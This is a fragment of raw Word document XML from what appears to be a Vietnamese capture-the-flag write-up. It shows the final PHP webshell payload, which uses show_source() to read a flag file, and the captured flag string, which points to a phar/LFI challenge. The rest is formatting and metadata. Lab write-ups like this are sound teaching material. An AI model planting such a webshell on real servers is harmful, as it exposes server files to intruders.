          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719AB3BA" w14:textId="02F282E1" w:rsidR="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E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Webshell cuối cùng là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C93A60A" w14:textId="4B5917A3" w:rsidR="001677E9" w:rsidRPr="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9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&lt;?php show_source(‘</w:t>
      </w:r>
      <w:r w:rsidRPr="001677E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>flag-mipkBswUppqwXlq9ZydO.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E0EAE" w14:textId="6C1A04CC" w:rsidR="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D36FE72" w14:textId="01CC35DB" w:rsidR="00E7008E" w:rsidRDefault="00E7008E" w:rsidP="001677E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123ACF41" w14:textId="0D882719" w:rsidR="00E7008E" w:rsidRDefault="00E7008E" w:rsidP="001677E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Thành công flag là “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7008E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lf1-Wr4pp3r_Ph4R_pwn3d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA1A09" w14:textId="77777777" w:rsidR="001677E9" w:rsidRDefault="001677E9" w:rsidP="001677E9">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0025A3" w14:textId="77777777" w:rsidR="00265080" w:rsidRDefault="00265080" w:rsidP="00265080">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B3FC7F" w14:textId="77777777" w:rsidR="00265080" w:rsidRDefault="00265080" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F24D2C" w14:textId="29DB7AEE" w:rsidR="00281F9E" w:rsidRDefault="00281F9E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE9A448" w14:textId="6F9A2C5D" w:rsidR="006C0AA5" w:rsidRDefault="006C0AA5" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B30DDF3" w14:textId="475DDA86" w:rsidR="006C0AA5" w:rsidRDefault="006C0AA5" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B81BD17" w14:textId="09480808" w:rsidR="007265E2" w:rsidRDefault="007265E2" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CA8D03" w14:textId="6FE6A095" w:rsidR="007265E2" w:rsidRDefault="007265E2" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A518DAA" w14:textId="6E90EAAB" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6A558C" w14:textId="77777777" w:rsidR="00A60B5E" w:rsidRDefault="00A60B5E" w:rsidP="0034784B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA62B6D" w14:textId="77777777" w:rsidR="0034784B" w:rsidRPr="0034784B" w:rsidRDefault="0034784B" w:rsidP="0035412F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2FA674" w14:textId="5B119332" w:rsidR="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C48C3F3" w14:textId="77777777" w:rsidR="00A627A0" w:rsidRPr="00A627A0" w:rsidRDefault="00A627A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B22BAA0" w14:textId="77777777" w:rsidR="00B84876" w:rsidRPr="00B30B6C" w:rsidRDefault="00B84876">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B84876" w:rsidRPr="00B30B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68E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8D"/>
    <w:rsid w:val="00092DA1"/>
    <w:rsid w:val="001677E9"/>
    <w:rsid w:val="00243079"/>
    <w:rsid w:val="00265080"/>
    <w:rsid w:val="00281F9E"/>
    <w:rsid w:val="002C4988"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0034784B"/>
    <w:rsid w:val="0035412F"/>
    <w:rsid w:val="004D268D"/>
    <w:rsid w:val="005129E9"/>
    <w:rsid w:val="005D53BA"/>
    <w:rsid w:val="005E005F"/>
    <w:rsid w:val="0064368D"/>
    <w:rsid w:val="006C0AA5"/>
    <w:rsid w:val="007265E2"/>
    <w:rsid w:val="00804F43"/>
    <w:rsid w:val="00881F08"/>
    <w:rsid w:val="00A60B5E"/>
    <w:rsid w:val="00A627A0"/>
    <w:rsid w:val="00AA584A"/>
    <w:rsid w:val="00AC767F"/>
    <w:rsid w:val="00B30B6C"/>
    <w:rsid w:val="00B760D4"/>
    <w:rsid w:val="00B84876"/>
    <w:rsid w:val="00BA0E33"/>
    <w:rsid w:val="00BA7A9F"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C51EF7"/>
    <w:rsid w:val="00D4618A"/>
    <w:rsid w:val="00E7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AD4A80"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8678881C-C869-0347-879C-1AECB22E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D107F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1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0D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A60B5E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A60B5E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A60B5E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A60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2022-11-01T14:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-20T10:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>